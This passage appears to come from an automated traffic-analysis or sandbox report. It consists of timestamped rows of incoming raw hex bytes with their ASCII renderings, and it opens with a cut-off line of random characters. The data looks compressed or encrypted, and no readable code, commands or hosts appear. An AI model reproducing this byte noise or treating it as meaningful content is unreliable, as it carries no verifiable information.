.4Az_Hr4U=p<D[/>s6=Mj&PMO6S/M[94m^FpUZC{Nx4FCk_TnJ_E3'KD[<abM]<pAo$cf)S?nuJb9B!!%"~kc\]
2021-12-15 13:13:48 UTC	32	IN	Data Raw: a4 a5 0a e3 24 e7 b1 06 41 90 47 40 a7 0c a7 2f fe 77 e3 ee a2 88 18 6e 56 7d cb 20 bd 2b e1 66 47 af b1 08 b3 97 7f 55 ba 14 23 4a b0 67 fa 10 51 d3 6a 59 d3 15 0a ea 0b 2a cf 75 0f fa 93 fc 63 4f 6d 06 3c df 53 17 44 80 1b 5d eb f0 77 ff e4 c3 ec 2a d0 25 b0 be 4a 55 85 9c 97 cb ee c0 ca 17 52 b9 86 c6 64 4f 2c b8 32 d2 57 30 1c 51 35 19 3b 80 1c a9 ff 38 12 6a 4d 43 4a 6d 4c 05 a5 81 4b 85 40 cd cb 0f ac 3b 1e 09 c0 0f 2e 6d e3 e3 fd c2 d7 67 9a 48 fe c6 6e d9 08 b5 ec ab 70 e0 cf f5 72 f1 01 52 ef d9 73 0a 6f b2 96 ff fb 76 e4 be 72 d7 cd 6d 15 00 13 73 1a 28 06 48 08 a8 00 37 14 4b 90 06 6a da 29 b2 c5 6f 2f 8e fa c3 21 fe dc 12 f7 82 72 20 36 56 08 57 31 99 e5 da ac c4 14 2a 03 24 24 27 9c fd dd 61 7c 15 ed 98 4f b5 dd 5e 94 cc 04 23 ad 25 c7 90 48 Data Ascii: $AG@/wnV} +fGU#JgQjYucOm<SD]w%JURdO,2W0Q5;8jMCJmLK@;.mgHnprRsovrms(H7Kj)o/!r 6VW1*$$'a\|O^#%H
2021-12-15 13:13:48 UTC	33	IN	Data Raw: 90 00 eb 63 43 16 73 39 72 0b 4e a5 1e b3 d4 1f bf 57 bd 75 1e c0 9c db fe c6 06 7e 89 d1 1b 00 87 62 b9 26 1b ce 25 2c e4 13 c9 85 4d 7f d5 90 d4 d2 0d ae 72 07 2a a3 db 92 8e 9d c3 de 36 9c 07 2b 1f 77 4a 1e 77 ba 63 1d 64 ed c2 c8 20 6d 88 0d 47 4b 15 8a fe a5 9f 17 5f 98 36 9d aa 7e fd 62 4f 05 d9 dc 9e a4 18 8b 92 30 73 20 89 17 82 2b fc 96 2b 9c b9 54 37 31 97 ce 42 c7 10 dd 2a 1f f7 6f 4d 3c e8 8b a3 81 d6 35 65 e7 8c 12 66 9b 9d 54 de 7e a3 75 0c ae d4 3f 68 36 5a b9 e4 30 de 0b 21 11 b4 9d 59 b9 8a ed df 6a 6d 8e d2 11 b3 b8 2f ce b3 51 ee 8e 99 24 24 16 64 72 54 23 33 90 2b b9 92 1d b9 54 8e 3b 39 39 1a 9e 7b 29 82 c7 f2 88 ab ce 56 ba 9f 50 e2 d4 0a de e3 94 a1 89 19 f5 12 65 bf dd 3e 26 22 f6 03 70 02 f4 08 c8 6b 20 14 72 08 f3 a2 1d 48 b3 a2 Data Ascii: cCs9rNWu~b&%,Mr6+wJwcd mGK_6~bO0s ++T71BoM<5efT~u?h6Z0!Yjm/Q$$drT#3+T;99{)VPe>&"pk rH
2021-12-15 13:13:48 UTC	34	IN	Data Raw: 7a 2d d7 9d 25 6b 4e 5b 71 bb ed f4 7d 82 fa a3 4a 23 83 49 0a ec 4c 3c fc 45 a2 f7 34 7e e6 6a fd 07 8f 11 a7 5d 74 08 aa 70 3d 80 ee 24 e4 1c 35 d5 79 e3 00 bf 6a 48 e6 74 30 36 ad 17 06 7c 1d 7e 09 6d 23 26 f4 f2 f9 52 2b 18 24 34 d6 32 8b c2 e9 f6 22 c8 85 24 1b e4 2d 21 8b 7e 7e 58 6d 14 8d de 3f 56 c2 93 f1 42 19 43 5d 87 48 62 74 be 19 1e 28 0e dc 7b 52 42 31 3b b0 88 b7 8d 2b 39 50 30 dd 4f c9 69 1d 3e be ea 77 36 1e cd ba 19 95 9d 5a 87 bc d5 a2 9f eb 14 fc 3b 9f 02 fb d4 c6 0a a1 ae 65 48 b1 04 f1 c9 10 fc 80 9b af a6 a3 f3 07 4d 7a bf b8 0b e9 d0 36 65 8d dc c8 2c 67 60 ab 21 2f 57 c6 66 27 51 c6 95 21 1e 60 2d 1f 5c cf 66 70 80 2a 98 cd 53 a2 30 64 e8 f6 46 92 64 40 82 60 26 df 72 4d dd a6 2a a1 f6 35 ba 42 43 9c 4d f0 f3 51 74 d0 27 39 82 c9 Data Ascii: z-%kN[q}J#IL<E4~j]tp=$5yjHt06\|~m#&R+$42"$-!~~Xm?VBC]Hbt({RB1;+9P0Oi>w6Z;eHMz6e,g`!/Wf'Q!`-\fpS0dFd@`&rM5BCMQt'9
2021-12-15 13:13:48 UTC	35	IN	Data Raw: 6b 84 89 fe 77 88 77 74 13 5a 06 1e c5 ab 37 90 a2 76 01 fa ee e0 fc da 2d c8 23 a9 d4 22 cc 45 53 1b 6e 6e c1 1d e4 e1 b6 f6 1a 54 b0 9f f6 90 5f c1 09 94 3b 93 17 71 db 7b 6e 52 99 e2 9a f2 23 61 c1 f4 ae 33 93 e8 bd e1 42 63 be d0 48 28 15 ca 3e 30 75 2c 1f 2b bc 84 b1 00 52 00 2b aa 77 b8 23 db 70 32 66 a9 5b 10 9f b7 5c b2 9a d4 d8 4a f8 88 78 8b d0 36 3a 4e 1a 01 b1 0a f0 18 78 9d 38 6f 82 0d 63 34 f3 1d 04 1b 01 b6 0d e5 49 f5 87 10 68 da aa 07 ca b8 14 c6 60 d8 23 8e 0e 91 2f 82 af de 26 12 06 19 da 96 a3 0e d8 7c cb 1b fe 86 fa 9c 7e 53 05 d8 2b 67 4d da 9f d4 15 19 32 ee c0 6c ba 56 ca 74 05 9e 58 54 31 63 85 63 d5 6a 4c 34 36 87 59 08 ca 8b 6d 08 63 2a 61 5d cc 52 e7 5f 8d bf 86 b5 0c c3 6f b1 11 ba 31 10 7f 4d 3d 6a b7 d9 53 60 02 57 98 17 ef Data Ascii: kwwtZ7v-#"ESnnT_;q{nR#a3BcH(>0u,+R+w#p2f[\Jx6:Nx8oc4Ih`#/&\|~S+gM2lVtXT1ccjL46Ymc*a]R_o1M=jS`W
2021-12-15 13:13:48 UTC	37	IN	Data Raw: cc 2b 22 4f 1e 24 a5 9d 9a 83 73 6e 3a bd a7 87 97 db 14 df a0 af 50 fa fd 16 5f 7d 3e 1c ca 4b 22 a1 95 20 52 1c 4b d7 e2 65 93 df 9d 49 ee e5 48 b3 86 6e 5f 0e f9 5f 10 2b de 29 51 aa 24 bc 36 ca bb 31 ef 78 11 19 0b 58 f7 2c 9b 9f 04 a6 52 6d a5 6e 93 ae 71 7f 89 72 27 69 5e ed 65 d4 4c 2f af 38 82 41 2a 08 c4 32 6a 41 d5 83 c6 30 e7 ed 23 cc ae 47 24 ea 60 fc 43 e7 c3 41 b3 1a 66 13 1d c1 b1 bf 84 62 01 eb 4e 8e ed bc e2 08 6f 6b 39 52 66 a4 7f 70 64 93 3c 5c d9 e2 ef 1f 98 ba 0f 81 97 dc 54 46 ff 40 ec 78 67 1a e5 3c 4a c5 25 15 38 c0 ee d4 63 96 c8 85 46 24 57 79 c0 eb 5a ff 5b 81 e4 ff ab 3d 79 45 90 c7 4c 00 fa a0 21 e7 29 da a3 db f0 af f4 3c 6d bc d5 fb 8b eb 20 f0 e0 cc 90 13 8b a5 12 e4 bd 46 41 9a c7 56 11 8e be 0c a5 5d 39 99 b9 04 35 65 f3 Data Ascii: +"O$sn:P_}>K" RKeIHn__+)Q$61xX,Rmnqr'i^eL/8A*2jA0#G$`CAfbNok9Rfpd<\TF@xg<J%8cF$WyZ[=yEL!)<m FAV]95e
2021-12-15 13:13:48 UTC	38	IN	Data Raw: 94 7b 3c c6 9c 82 20 a6 9d 35 f0 3f d3 17 b6 01 bb 01 22 b8 60 2d d4 4c 36 1f a2 79 19 f4 fb 1b ba 70 99 fc 10 f2 c8 a5 f6 fd 0b c7 e1 fa e3 36 b6 50 99 b5 c8 dd e3 aa df e7 b3 e5 4a 67 0a e8 2a a0 bb 95 34 dd f3 71 fa fd cc 85 bf 2e be dc b6 4c 4a 3d 63 73 2f 68 8c d2 0c de 26 02 f3 89 fe d2 9d 7a 32 94 4b 41 55 55 fd 86 d0 66 49 8c 60 fe d0 d5 5e b0 ab 03 fe 99 93 04 db ac b9 19 1e f4 0d d2 fe ad 36 00 8d 75 5e 8a 34 be 83 57 66 4b 3e a1 de a9 0c ab f5 11 63 15 1e 3b 81 84 c8 d9 41 f3 08 17 38 74 cf f3 d5 35 55 13 87 80 88 9a 2d ae dc 0e 5a ac 0a c5 69 c6 be a0 22 23 1b f7 98 d3 17 08 0f 89 55 8a bd 8a 8c 45 a1 e8 8f 02 36 c0 59 30 00 2d 10 3a eb 60 39 8f e5 30 5d bb 7c 70 8f 0d 98 cd 55 a6 54 a1 a3 3c 81 18 d9 b8 97 b1 cc 55 b9 5d a1 76 05 16 e7 c3 6d Data Ascii: {< 5?"`-L6yp6PJg*4q.LJ=cs/h&z2KAUUfI`^6u^4WfK>c;A8t5U-Zi"#UE6Y0-:`90]\|pUT<U]vm
2021-12-15 13:13:48 UTC	39	IN	Data Raw: 63 cb 2f 2a f0 a8 38 47 89 c2 ad 67 ee 8c 7b 78 ff 77 0b 30 01 8b b2 9b bc fb aa b4 54 39 65 19 f7 6b 2f 75 ca a6 c5 a0 83 86 48 4f 62 c7 fa 5e 20 a0 4b d7 a3 be fe 93 84 69 76 13 20 5e c2 8a 50 a0 53 03 f7 4e 51 e8 86 9b 69 dd da f3 09 c8 76 3f 7a f4 be de 6c 22 61 be 53 35 20 b5 dd 8b 3d bc 2d 12 3b ae 01 71 65 a6 d4 aa 6d 77 31 69 f3 c9 54 7a c3 07 2a 92 e1 5c d9 02 d5 d8 40 79 78 a3 e5 2e 12 3b 4e 1a 01 b1 8a 30 69 1a 16 07 65 d2 67 6a d7 ea 8b 84 4e ba 58 ba 6e 1c 8a c0 d8 3a 62 fe c9 82 6e 97 02 fb 18 1b 70 01 32 3f fb ac 5c e3 82 a5 8c 30 04 53 a7 ec 43 cb 97 be 16 aa 74 98 9e 4c 87 a9 a3 de 9f 5d 28 77 6a 86 92 7f 8b 65 58 b2 9b 71 34 d7 b8 31 31 d2 31 7e 82 9f e7 43 3e fd 3e 39 4b a8 fc 28 fd 94 50 45 17 07 8d 95 98 84 be e0 7b a4 d5 9c ff c1 2a Data Ascii: c/8Gg{xw0T9ek/uHOb^ Kiv ^PSNQiv?zl"aS5 =-;qemw1iTz\@yx.;N0iegjNXn:bnp2?\0SCtL](wjeXq4111~C>>9K(PE{*
2021-12-15 13:13:48 UTC	40	IN	Data Raw: b8 41 1e b4 54 27 24 24 54 1e d8 2a e4 ef 68 ea 5d 83 b3 ad 48 f7 54 af e7 0a b7 14 96 af 88 31 32 b6 27 a1 88 49 75 b8 7b be dd ed 88 2e fc 07 b4 7d 66 60 2d b7 ee f4 c9 3f 49 d6 15 9c fa f4 45 2c c3 c8 f4 c0 9a be 74 77 08 13 89 a7 5a a2 fe 3a 31 9c 5d 62 d0 82 9e 5b f4 f0 33 2a 7e 9d b9 ed ab 53 fe e7 7f 45 58 e3 b8 d4 06 68 26 db 3d 2c f5 d6 7b 20 32 69 4d d7 86 46 04 2f b2 fb 14 e6 a5 d7 f4 3e a7 95 61 d4 f3 cd 60 b6 82 f0 73 18 e2 00 96 d4 5c 9c 9a 13 83 6b 66 38 fd 56 e7 ec 19 1a b9 b9 96 0f fc c0 9c e3 c7 d9 4a 37 dd 24 19 29 c3 81 14 59 ba 67 19 ef a0 24 9b 92 f8 4e 00 e0 59 ba 1d 86 8d c7 ea 6c be aa 98 5d 21 4d 5d af 7c 19 3d f2 50 8c bb 0c f9 79 e7 e9 e8 52 91 a2 2a fb dd ce 4e 96 5a 50 c3 1b bd f6 88 94 d8 f5 4a bf a1 21 91 e9 7a d4 ec be c1 Data Ascii: AT'$$Th]HT12'Iu{.}f`-?IE,twZ:1]b[3~SEXh&=,{ 2iMF/>a`s\kf8VJ7$)Yg$NYl]!M]\|=PyR*NZPJ!z
2021-12-15 13:13:48 UTC	42	IN	Data Raw: 94 61 b3 e4 fa 2b 8e 6b 51 b2 da 94 58 12 34 f3 a3 39 f2 5f 9e 67 85 fe 38 4d 4a 69 37 f2 a2 1e 8b 27 35 a7 61 aa 96 5a c5 7f bd 43 2f 2b 04 5f c4 9d 22 f4 23 07 05 81 17 d2 f9 f7 c5 96 aa 55 e7 0f 2b 65 de 6d d3 a2 1a b5 ec 09 fc 66 5c a5 34 5c c0 99 7d 7f 06 c2 1e 47 ef 77 55 b9 95 be be 9c 0c a3 1c aa 59 9e a2 19 45 7b c9 7d 2a 9e cf 97 12 b0 30 d5 82 2b 8a 5e ea 1b 22 ab 94 8d f3 82 3e 48 e2 4b c4 6f 8c d9 e9 0a e7 e1 88 08 12 79 df f6 06 b9 51 50 04 bf f8 fc e2 33 b3 ff 12 ff 2b be fb d6 c1 68 42 02 ea 7e 45 bc 85 8c 3c d5 a2 6f 6d 5b 6e 07 8b fd 04 15 6f 8b 17 3a 58 10 ed 1f 7e 42 64 08 dd 6f 2b 6f 8d f8 f6 6e dc 61 de 33 40 14 31 66 d8 78 cc e4 61 16 93 fd bf 6f c0 03 1a 49 82 96 21 1e 03 a0 cc d0 5b 23 44 0e 03 16 0c 19 64 a9 a4 dc 09 1c e7 50 c5 Data Ascii: a+kQX49_g8MJi7'5aZC/+_"#U+emf\4\}GwUYE{}*0+^">HKoyQP3+hB~E<om[no:X~Bdo+ona3@1fxaoI![#DdP
2021-12-15 13:13:48 UTC	43	IN	Data Raw: e2 46 aa 12 8d cb d0 6c 41 03 89 06 6b 26 c3 fb 3b 98 a2 d9 ae be 5d 9f 68 ea 88 1e 7a 3f a6 ac 33 74 f6 c2 1f cf 71 46 b6 7c 29 e1 d9 f8 65 ad 79 9c 61 cb f7 54 2b dd 07 48 db d0 fc f3 4c e3 90 5c fe 3d 17 cc fe 1b 75 f9 a0 3d 49 d4 f0 96 04 7d c7 05 17 79 db a2 da b2 64 e6 d1 e3 9c ef d2 a8 76 1f 5d e4 aa 2f 0e d7 a5 75 81 5b 7a a8 89 00 41 7b f1 2a 63 13 6d e8 6b 45 d9 24 d8 7e 32 e9 9c c5 d5 48 4b 29 fa 95 98 83 7a f5 d7 f2 f7 cb 7a 0e d9 85 66 8a d8 e3 82 62 10 0d c0 33 d1 82 71 64 c0 e7 ad 48 4d 2e 5c 36 c3 55 5a 75 07 10 b7 5b 22 f1 2c 18 ef fa b9 46 40 ea c6 0d 2a 6d c1 19 a6 ad 87 55 1b 03 0c 91 46 e1 05 63 3e fb 0d c7 ed e2 8e e5 62 a2 10 e1 b8 a9 ff 16 2e 22 48 9b 8d cf 51 38 92 b0 9a ce 79 7d c6 c0 c0 72 15 45 b5 b4 11 33 7c af 21 5f 82 92 57 Data Ascii: FlAk&;]hz?3tqF\|)eyaT+HL\=u=I}ydv]/u[zA{cmkE$~2HK)zzfb3qdHM.\6UZu[",F@mUFc>b."HQ8y}rE3\|!_W
2021-12-15 13:13:48 UTC	44	IN	Data Raw: ec 42 81 60 26 56 a0 26 29 80 ee 9c 6b bb ba e0 c8 6f 19 b3 6f 12 0a ac dd 7e b5 4b 8a 48 71 7b 5b 74 ff 1c 93 68 62 ec 88 4b 0e 65 f6 8f 6d 78 f7 03 6c 95 91 0b db dd 1a 49 11 61 9a 2b c1 77 76 a8 e2 10 08 cc 81 e0 5b e2 34 f4 4e 69 66 c3 ec a2 90 17 e0 d0 25 e0 a5 84 f8 07 e8 2d 11 d6 1f 20 25 5d b0 83 5d 2c 6d 9e a4 01 fd 32 d6 fe 87 0d d5 2e 62 20 78 bc d6 f5 70 97 da 3d c4 7a f2 27 30 3a 59 2d 54 37 51 bc a1 b1 f8 95 76 e3 e7 e8 61 a2 94 21 71 de f6 69 a3 8b 64 ca 4e 6a e9 eb 82 5e 2e a8 1b 0e 23 45 f6 ad 41 74 e1 19 0d b7 9e 92 0c 51 ca a7 e3 2f 98 6c 68 86 f9 80 e2 8d 81 78 dd 7a 12 1c 83 3d b9 0a 9d 45 f5 17 42 4f a0 e3 7a 72 fc 94 a2 22 6b f5 9e fc 80 85 11 6a de 31 a5 8b 19 44 82 06 78 12 04 69 93 66 28 aa 3e 6c 40 2f 19 de 44 8b 52 0e 47 38 6b Data Ascii: B`&V&)koo~KHq{[thbKemxlIa+wv[4Nif%- %]],m2.b xp=z'0:Y-T7Qva!qidNj^.#EAtQ/lhxz=EBOzr"kj1Dxif(>l@/DRG8k
2021-12-15 13:13:48 UTC	45	IN	Data Raw: 52 0b 80 98 b3 33 f2 e5 4a a9 99 84 a1 4a 7c 67 7a 9a 26 61 a3 8d 7c ce d4 74 1b b1 38 90 1c e4 d5 59 62 3b b1 ce 7d b6 12 e0 5e 0c 27 f1 58 89 a0 5f 60 7c 5a 73 4e 1c 9b 3f 2d 89 18 38 14 26 85 3f 98 00 f5 38 b3 ca 82 89 b8 52 99 c9 e4 ab 64 6b d0 e0 98 fd 22 8e 55 00 eb 00 5a 8c b6 19 74 34 38 a2 c4 de 4b df 41 a8 60 08 f3 90 63 24 27 dd 9d 25 a5 51 53 85 73 10 82 d5 1b c7 25 18 58 46 ac 42 7e 37 da a5 00 57 cc 7e 07 5f 57 e9 f5 09 93 12 ce 87 33 23 33 92 a6 70 c9 da 2a df 32 30 37 bb a3 97 cf 7a fb e0 3b 5f bd 10 f6 7e 48 f0 59 64 78 7d 7a 3f f4 9d df 0a 0c aa 52 a9 c3 86 b0 f2 be 75 81 3f c4 ff d7 c1 25 8f 91 92 89 7c 21 6e 7e 6f ca 48 7b 7d f2 07 ce e8 e0 0e 34 8e 53 b4 65 8d 8c 76 73 f5 9b 56 de 7e 36 bd 85 4c 2f c1 97 8e 87 01 70 d0 a6 30 ca 70 71 Data Ascii: R3JJ\|gz&a\|t8Yb;}^'X_`\|ZsN?-8&?8Rdk"UZt48KA`c$'%QSs%XFB~7W~_W3#3p*207z;_~HYdx}z?Ru?%\|!n~oH{}4SevsV~6L/p0pq
2021-12-15 13:13:48 UTC	47	IN	Data Raw: fe 15 07 58 d3 3c e5 a9 9b 68 f2 d4 ef 22 cd 6c 46 07 48 48 d8 44 59 00 43 e0 34 46 21 19 27 06 ad 1b b2 17 9a ff 31 39 f4 49 a2 93 01 a9 e1 52 07 e5 13 67 d6 c8 6f d6 08 79 8c ee e0 f6 0e ae cb 37 a4 50 04 46 08 9b c3 c4 23 d0 91 22 5b ef f0 02 28 6b f4 7c 55 d2 87 bd 2a c8 14 c3 f8 9b 3d ad 32 bb 74 ea e1 64 26 79 65 a1 de 83 2f 73 e3 3e ff fa 95 36 6d 25 66 95 1b bd ea d4 5b 7e 91 41 b2 45 da df c5 b0 ff 8c 15 89 9a ec 6e 1e ee b1 f2 e7 82 dc 5c 85 71 42 25 53 88 c8 3b bf 84 99 c5 a1 84 a5 e4 f6 af dd 08 7c 5d da b5 b6 e1 ec 7e db fa c9 e5 61 cd 8f 9d 66 09 14 ff 08 aa 9d fe 60 e0 13 8c 3e bd f1 9b f4 bd a0 38 ab 6d 0f 76 32 20 57 bc 19 2d 27 e2 f5 18 fc bb 4d 87 a1 32 36 91 d0 4d db d3 01 a3 38 93 6a bb 3e 21 4a 40 29 fa d8 70 26 61 05 6e d1 43 0d f1 Data Ascii: X<h"lFHHDYC4F!'19IRgoy7PF#"[(k\|U*=2td&ye/s>6m%f[~AEn\qB%S;\|]~af`>8mv2 W-'M26M8j>!J@)p&anC
2021-12-15 13:13:48 UTC	48	IN	Data Raw: f8 4d e7 66 a7 90 35 4a e0 a5 cf d9 4e 52 35 33 62 26 ab ea 35 75 bb b0 42 1a 49 bf 4c 67 c1 7d 91 27 87 32 53 65 ff f5 bc da 6b 01 ae 45 49 5e 20 bc e7 ca 13 65 24 58 53 2d 36 b4 c4 f0 60 cb 6a 12 75 34 48 0a b3 dd 5e 97 24 54 1c ac 1f e2 65 4b cc 81 ef 43 1d cb f4 4e 4d ff de 07 46 cd d4 05 cc bb d9 f0 0f 4a d9 c7 60 c9 b1 c1 45 63 6e 32 8d 80 da 08 1d a0 3f 9f 32 a3 26 71 8f 38 5b ef e2 5e 03 d4 fd 90 a5 9e cd 47 81 d9 0e 25 3a dc 4f 21 74 0a 37 e7 fd 72 f2 fe 8f d7 f4 88 7d 21 5d c8 41 0e 61 21 df e6 04 b0 3b f1 9e f5 da fd a8 bc f6 25 c7 39 04 a6 18 13 93 05 bf 17 66 82 3e 78 da f3 27 ed 21 62 2d 2c 5a 61 48 c7 1c 8f f1 4f 14 de a6 f7 8b ad 41 f5 f0 92 f3 6f 4f 0c c8 2f 68 b6 8a 90 ba 58 41 6d 41 47 e1 28 f9 ea 85 a4 38 44 73 34 68 47 a4 bd 51 bc 26 Data Ascii: Mf5JNR53b&5uBILg}'2SekEI^ e$XS-6`ju4H^$TeKCNMFJ`Ecn2?2&q8[^G%:O!t7r}!]Aa!;%9f>x'!b-,ZaHOAoO/hXAmAG(8Ds4hGQ&
2021-12-15 13:13:48 UTC	49	IN	Data Raw: c5 f5 87 3c ab 1b b8 24 36 5e d3 ae c6 d3 0b 53 08 2f d8 7b 99 52 13 c3 4c f8 c1 99 4e a9 6c 90 4e c2 d0 a5 75 03 70 b5 43 c7 6f f7 ca cc d2 2f 4a b9 be 48 b5 12 75 0e 0d b7 9c a2 aa 5f a0 eb c3 d3 b7 4d 74 23 b1 4d 04 97 44 e9 88 f7 23 7a 76 1d 4c a4 b8 61 06 02 ff eb 7b 04 88 30 82 3a 99 a3 1a c9 a3 7c 89 6e 94 46 6a 48 22 34 80 79 79 0c a7 32 bb 7a ab cf 1f 14 6d 35 cc 50 41 8d a6 ea 18 c2 83 43 ed 46 e9 ea 04 d2 ef b0 31 24 88 86 7a a0 0d 9b 5f f4 93 f9 d5 22 26 46 22 03 ed 82 04 28 88 ed 4a 4d 27 98 8c 93 0f 90 31 65 6e 8f 93 bf d0 f8 38 14 1d d6 cb 28 28 cb 84 18 19 33 c3 c9 be 2d 9d 9f d1 ca 13 0f a9 7b 15 17 f3 bf fe 7d f7 57 64 95 a1 55 1e ca 96 03 79 41 1b 09 13 e6 bc 26 00 e3 8c db 08 e2 8b cb d3 80 dc bd 4e 73 ba 22 59 95 0b 80 25 ef d5 5d 6d Data Ascii: <$6^S/{RLNlNupCo/JHu_Mt#MD#zvLa{0:\|nFjH"4yy2zm5PACF1$z_"&F"(JM'1en8((3-{}WdUyA&Ns"Y%]m
2021-12-15 13:13:48 UTC	50	IN	Data Raw: c0 ed e8 72 93 51 fa b8 1d 7a 29 8b 7e 51 f6 10 7d 81 44 42 31 ea 0d cf 4a 10 d0 be 1f 46 54 69 c5 82 1a 5a 9b 71 48 90 26 be 29 b8 39 ec 81 29 01 28 87 2d cf 4f 9b bc 41 f2 4d d2 ae ba 47 ef 5f 37 5b 0f 73 20 5a 40 55 f2 fc 29 34 db 46 f9 ad 75 5f 5b 33 2a 04 15 82 53 c6 6f 8b 5c 34 f3 90 b6 34 b6 08 0c 01 74 a1 a3 62 b0 a8 28 b7 fa 9f 94 d7 fc c2 f0 56 09 ba de f2 b6 e6 77 08 c0 73 76 f2 ad c4 21 9f 79 bc 51 99 c9 5e 8f 8e 30 3d 9c a3 d6 83 0d 3a 51 66 bd 3d a6 77 4b 91 7d be 8f bd a5 40 d1 79 d2 5c 1f b9 c2 33 24 de 90 4a 23 11 a2 21 ff e8 e1 1a 2a 59 8b 25 e8 4c ba 53 0b 1f 7e 12 96 68 25 77 91 6b 2a e7 e6 84 9c bc 66 6c 70 0c 74 d2 19 d9 32 49 bf 7b 21 42 57 ec a0 cf 63 81 6a 04 6b cb ce da 28 05 d7 9b 82 d0 7d 9c 6a de 6a a3 75 5e b1 78 10 d3 6a 77 Data Ascii: rQz)~Q}DB1JFTiZqH&)9)(-OAMG_7[s Z@U)4Fu_[3So\44tb(Vwsv!yQ^0=:Qf=wK}@y\3$J#!Y%LS~h%wk*flpt2I{!BWcjk(}jju^xjw
2021-12-15 13:13:48 UTC	51	IN	Data Raw: a0 2d c1 b2 14 b4 63 10 1e dd 31 49 06 d8 55 84 76 8a 52 7e e2 7a da a1 6c b6 80 96 62 5e 55 cc 2c bf e1 ab 3d f3 e8 7e b2 fe 07 fa a0 05 61 17 5e 52 bd 70 93 ca f4 17 7b 01 37 49 13 b0 b9 95 8e 90 d2 41 5b de ed 7d 14 5c f9 e3 12 c1 c1 40 0d d0 d2 c5 d9 0c c6 35 08 20 ae e8 7c dd 52 4b e3 9e 4a 4a b8 e7 bd 38 04 88 77 f5 82 5e a6 f2 65 05 27 b3 95 dd 1b 26 07 9b f4 f8 5c 8a 44 f7 ab 86 72 af f5 62 90 3b f5 8c 14 ea 63 cb 37 da 09 cd 65 82 f9 37 3c 08 94 b0 86 80 10 5f 10 e8 86 10 e5 17 bf 57 32 a9 1c 61 10 92 65 a3 ab 61 9e 41 82 9b 29 b6 65 97 f3 15 e0 91 ff 3d 40 95 ef e3 27 0b e6 70 ea 70 33 10 ee 72 a9 d8 84 fd e8 ea e5 7a 8e 53 26 e0 b3 78 02 59 62 d2 3d 49 c5 a1 8c 34 14 fe e0 44 4d f4 7b e8 e8 a6 89 f7 1a 50 b7 5f 39 4a e1 4e 2d 95 75 7b 2b 93 eb Data Ascii: -c1IUvR~zlb^U,=~a^Rp{7IA[}\@5 \|RKJJ8w^e'&\Drb;c7e7<_W2aeaA)e=@'pp3rzS&xYb=I4DM{P_9JN-u{+
2021-12-15 13:13:48 UTC	53	IN	Data Raw: a2 50 59 d3 06 be fd a3 cd dd f0 61 59 fb e1 20 d0 e8 f1 cd 93 81 c6 a8 60 4a 8b f0 07 4d 7c 65 06 c9 7d 29 cb 34 eb 05 c0 a1 61 62 ab 36 45 82 30 00 25 a1 36 eb 1a ed 0b 9b 08 5d a5 34 97 36 b8 99 cd d0 0c 2e 6c bd 82 a5 e0 26 ea 29 77 b3 b7 46 99 a5 f2 35 41 8d b7 cd 8b 37 6c d4 86 8d 51 60 bb 90 d3 b9 39 99 d7 2a a8 54 d4 a2 23 bc 93 1f ed 77 9e 44 27 9f 57 6b 94 5d 77 e6 cc fa 2c 57 dd 6e 26 23 2c 78 33 02 08 f7 37 88 6f 4f cc 81 e5 40 e2 34 1d 8a e0 34 85 70 5c 6f 45 6d 2d 2c b0 f3 6c 52 a3 d4 87 19 fe a8 d8 f5 52 40 58 0b a7 18 1b aa 7f 61 cd 5c fe ec 6e 59 2e 17 68 eb bb d6 0e 24 27 db 3d 49 ef db 86 df 46 75 19 bc 55 87 37 e7 6e b6 8a a1 17 d6 f4 60 fc 96 29 d2 97 3d 88 e8 5a 94 c2 b3 cb 0e ce d7 3f ba 2e 67 09 ee bd ff 07 56 e7 42 0e 2c d3 5a 96 Data Ascii: PYaY `JM\|e})4ab6E0%6]46.l&)wF5A7lQ`9*T#wD'Wk]w,Wn&#,x37oO@44p\oEm-,lRR@Xa\nY.h$'=IFuU7n`)=Z?.gVB,Z
2021-12-15 13:13:48 UTC	54	IN	Data Raw: cf 6e 14 94 2c d8 67 5e 46 fc 78 14 b9 f6 83 e8 8d e6 9e 17 7f 0d 5b 31 cb d3 3f d6 a7 9c 7e bb a5 37 ca 67 ce 70 8d d0 05 2d eb 26 be 5b 26 dd b7 34 49 8e 98 65 55 09 d2 f6 c3 52 ec c8 8d 78 15 85 2d 2e ee a0 77 64 69 89 18 17 07 d6 20 d9 ef f0 e4 20 3a d0 15 53 3c 66 c5 e8 50 4a c0 76 27 08 a1 91 d0 7d be b5 15 d8 f3 23 a6 32 3b aa 53 cc 49 ed b9 8c 0f b7 12 25 ed e3 5d 9f 6b 3f 20 ad e3 57 a5 ad b4 f9 38 14 f4 cc be f1 05 06 c8 63 74 0b 04 50 c5 5d 60 e4 de 1b 6a d0 e8 d2 41 46 67 5c 50 81 e8 d1 95 e6 4e 1f 41 47 f2 49 31 83 78 35 8f d8 0b 3a 3d 63 af 3a 34 81 a6 61 0d b4 00 ed e1 2f 7d 76 97 2c 17 b3 2f 1c 5d f7 3b dd fb de a6 88 6e 85 ee e1 b6 c8 9f 64 95 93 8f 0f 74 d4 19 4e 20 21 a3 06 52 42 5b 5b bb c2 ce 80 6d aa 17 46 4b b5 5a 5e 24 cb 0f 0d 7b Data Ascii: n,g^Fx[1?~7gp-&[&4IeURx-.wdi :S<fPJv'}#2;SI%]k? W8ctP]`jAFg\PNAGI1x5:=c:4a/}v,/];ndtN !RB[[mFKZ^${
2021-12-15 13:13:48 UTC	55	IN	Data Raw: 7d 1d 7a a2 23 d6 7e a9 6d e4 37 dd f7 50 af a2 f8 1c dc 2b fa b8 06 60 7a 01 d7 d0 40 fb 1f a3 87 1d 85 64 ee 1a 0c 81 43 2b 9b 2a f3 7e 48 66 f8 c2 0d ff 3b f4 00 f8 79 64 73 b9 14 04 5d cb fb d6 c6 2c 93 ae 5c 95 90 0e b8 ec 9a 31 65 59 3e 26 95 1e 2d 7e 37 be 33 a3 d6 d2 8e 0d 2f 81 8a 4b 3d 0a 40 63 ef a5 93 00 e3 92 21 f3 16 41 ff 86 64 00 3f 2e cd 88 74 09 db 3c 2a 58 9c 5d ef 8a e9 68 5f 00 d0 e0 75 41 20 fa fb ab d4 48 56 f7 4b 29 3b f6 48 1c 09 26 7f 09 44 0f c2 df 0f 03 dc 39 53 e2 fc 10 45 01 f5 fa e8 79 70 e5 5c 74 5a 5d c1 1c 63 9b 04 5c 3a 5f 9a 0b ac 2f 23 a3 b0 25 78 1b 3d 2d 91 99 9d 45 3a e4 93 5f aa 6d 1d ba 40 2c 40 54 62 b3 9b 12 7d 31 4e e8 ba d5 55 45 55 4e f3 0d 58 63 69 b1 48 4c 27 cf ce 1c 7d c2 0e 16 